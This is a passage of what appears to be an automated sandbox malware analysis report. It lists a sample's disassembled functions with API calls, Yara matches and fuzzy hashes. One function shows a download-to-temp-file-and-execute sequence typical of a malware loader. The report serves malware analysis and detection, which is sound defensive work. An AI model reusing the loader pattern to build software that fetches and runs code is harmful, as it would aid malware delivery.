                                                                                    • GetKeyState.USER32(0000001B), ref: 00402818
                                                                                    • DestroyWindow.USER32(?), ref: 0040282D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                    • String ID: gya
                                                                                    • API String ID: 2545303185-1989253062
                                                                                    • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                                                    • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                                                    • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                                                    • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                                                    Function 0042E6D2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2509303402-0
                                                                                    • Opcode ID: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                                                    • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                                                    • Opcode Fuzzy Hash: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                                                    • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                                                    Function 00A0E939 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2509303402-0
                                                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                    • Instruction ID: 976722d5bc95d43f5539c89e12a3e4f6c1dbe8041abf4d9499d0f9a7afc893e2
                                                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                    • Instruction Fuzzy Hash: 9AB1B271900209AFDF11DF68C981BEEBBF4BF09340F14486DF455A7281DB769881DB60
                                                                                    Function 00A00C46 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 136threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A00C56
                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00A00CBD
                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00A00CDA
                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00A00D40
                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00A00D55
                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00A00D67
                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00A00D95
                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00A00DA0
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A00DCC
                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00A00DDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                    • String ID: 11@$%D
                                                                                    • API String ID: 3720063390-4114847594
                                                                                    • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                    • Instruction ID: d8282d752e395fb162e1950f7addd0d990faff6ffbb912007caf0e08eb841030
                                                                                    • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                    • Instruction Fuzzy Hash: F741C230A0024C9BDF05FFA4E565BFD7765AF81304F1440A9E9456B2C3CB75AE45C7A2
                                                                                    Function 0043A618 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                                                    • _free.LIBCMT ref: 0043A651
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                    • _free.LIBCMT ref: 0043A688
                                                                                    • _free.LIBCMT ref: 0043A693
                                                                                    • _free.LIBCMT ref: 0043A6B5
                                                                                    • _free.LIBCMT ref: 0043A6C8
                                                                                    • _free.LIBCMT ref: 0043A6D6
                                                                                    • _free.LIBCMT ref: 0043A6E1
                                                                                    • _free.LIBCMT ref: 0043A719
                                                                                    • _free.LIBCMT ref: 0043A720
                                                                                    • _free.LIBCMT ref: 0043A73D
                                                                                    • _free.LIBCMT ref: 0043A755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                                                    Function 00A1A87F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 00A1A8C3
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C2F
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C41
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C53
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C65
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C77
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C89
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C9B
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CAD
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CBF
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CD1
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CE3
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CF5
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19D07
                                                                                    • _free.LIBCMT ref: 00A1A8B8
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1A8DA
                                                                                    • _free.LIBCMT ref: 00A1A8EF
                                                                                    • _free.LIBCMT ref: 00A1A8FA
                                                                                    • _free.LIBCMT ref: 00A1A91C
                                                                                    • _free.LIBCMT ref: 00A1A92F
                                                                                    • _free.LIBCMT ref: 00A1A93D
                                                                                    • _free.LIBCMT ref: 00A1A948
                                                                                    • _free.LIBCMT ref: 00A1A980
                                                                                    • _free.LIBCMT ref: 00A1A987
                                                                                    • _free.LIBCMT ref: 00A1A9A4
                                                                                    • _free.LIBCMT ref: 00A1A9BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction ID: 20af751507773bd7004eee0eecf64f6e27a02ab812ca86744d9a9c4d225b312c
                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction Fuzzy Hash: 0A318B72601305EFDF20AB38D942BDAB3E8AF11390F11482AF468CB251DE71ADD08A16
                                                                                    Function 00439AA9 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                    • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                    • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                                                    Function 009E2C7B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 009E2C9E
                                                                                    • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 009E2CB4
                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 009E2CD0
                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 009E2CE6
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 009E2D1F
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 009E2D5B
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009E2D78
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 009E2DEF
                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 009E2E04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                    • String ID: <
                                                                                    • API String ID: 838076374-4251816714
                                                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                    • Instruction ID: 5120e125bbfffde8c29b1b0276af1cf95e76deefd5f588d1a878856eeb0b033a
                                                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                    • Instruction Fuzzy Hash: 7641507190026CAEEB219F61DC85FEAB7BCFF09745F0081F9A549A2150DE709E858FA4
                                                                                    Function 0042486D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                                                      • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                    • String ID: 11@$pContext$switchState
                                                                                    • API String ID: 3151764488-3851367110
                                                                                    • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                                                    • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                                                    Function 009FEEE2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,009FF248,00000004,009F7DA7,00000004,009F8089), ref: 009FEF19
                                                                                    • GetLastError.KERNEL32(?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000,?), ref: 009FEF25
                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000), ref: 009FEF35
                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 009FEF4B
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF61
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF78
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF8F
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFA6
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                    • String ID: advapi32.dll
                                                                                    • API String ID: 2340687224-4050573280
                                                                                    • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                    • Instruction ID: edb5e664a0d414903aee43efd090939b8951afd2ad817f03e992e8255dff809b
                                                                                    • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                    • Instruction Fuzzy Hash: 772190B1904714BFD7106FB49C09B6ABFACEF05B16F104A2AF651D3651CB7CC5408BA9
                                                                                    Function 009FEEE5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,009FF248,00000004,009F7DA7,00000004,009F8089), ref: 009FEF19
                                                                                    • GetLastError.KERNEL32(?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000,?), ref: 009FEF25
                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000), ref: 009FEF35
                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 009FEF4B
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF61
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF78
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF8F
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFA6
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                    • String ID: advapi32.dll
                                                                                    • API String ID: 2340687224-4050573280
                                                                                    • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                    • Instruction ID: 8df436c9da974996bb95b471d5af40cdd2dcb47cd52c9b1797cd2974c2faf5b4
                                                                                    • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                    • Instruction Fuzzy Hash: 0F21B0B1904704BBD7106FB49C09B6ABFECEF05B12F004A2AF651D3651CB7CD4408BA9
                                                                                    Function 009F24C7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,009F672B), ref: 009F24D6
                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009F24E4
                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009F24F2
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,009F672B), ref: 009F2520
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009F2527
                                                                                    • GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F2542
                                                                                    • GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F254E
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2564
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2572
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                    • String ID: kernel32.dll
                                                                                    • API String ID: 4179531150-1793498882
                                                                                    • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                    • Instruction ID: 429ccf10ea0a48d50301ba5d06f1fc4f3c6a4dd706c065af9a88b13decbbd63e
                                                                                    • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                                                    • Instruction Fuzzy Hash: 4D1182759043187FE7107B74AC9AB7B7AACAE41B127200536BA11D21A2EA79D900876D
                                                                                    Function 0043EEC2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: DecodePointer
                                                                                    • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                                                    • API String ID: 3527080286-2461957735
                                                                                    • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                    • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                                                    • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                                                    • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                                                    Function 00419766 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                                                    • SafeRWList.LIBCONCRT ref: 004197B8
                                                                                      • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                                                      • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                                                    • GetLastError.KERNEL32 ref: 004197D9
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                    • String ID: eventObject
                                                                                    • API String ID: 1999291547-1680012138
                                                                                    • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                    • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                                                    • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                                                    • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                                                    Function 0041515E Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
                                                                                      • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
                                                                                      • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
                                                                                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
                                                                                      • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
                                                                                      • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
                                                                                      • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
                                                                                      • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
                                                                                      • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
                                                                                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 64082781-0
                                                                                    • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
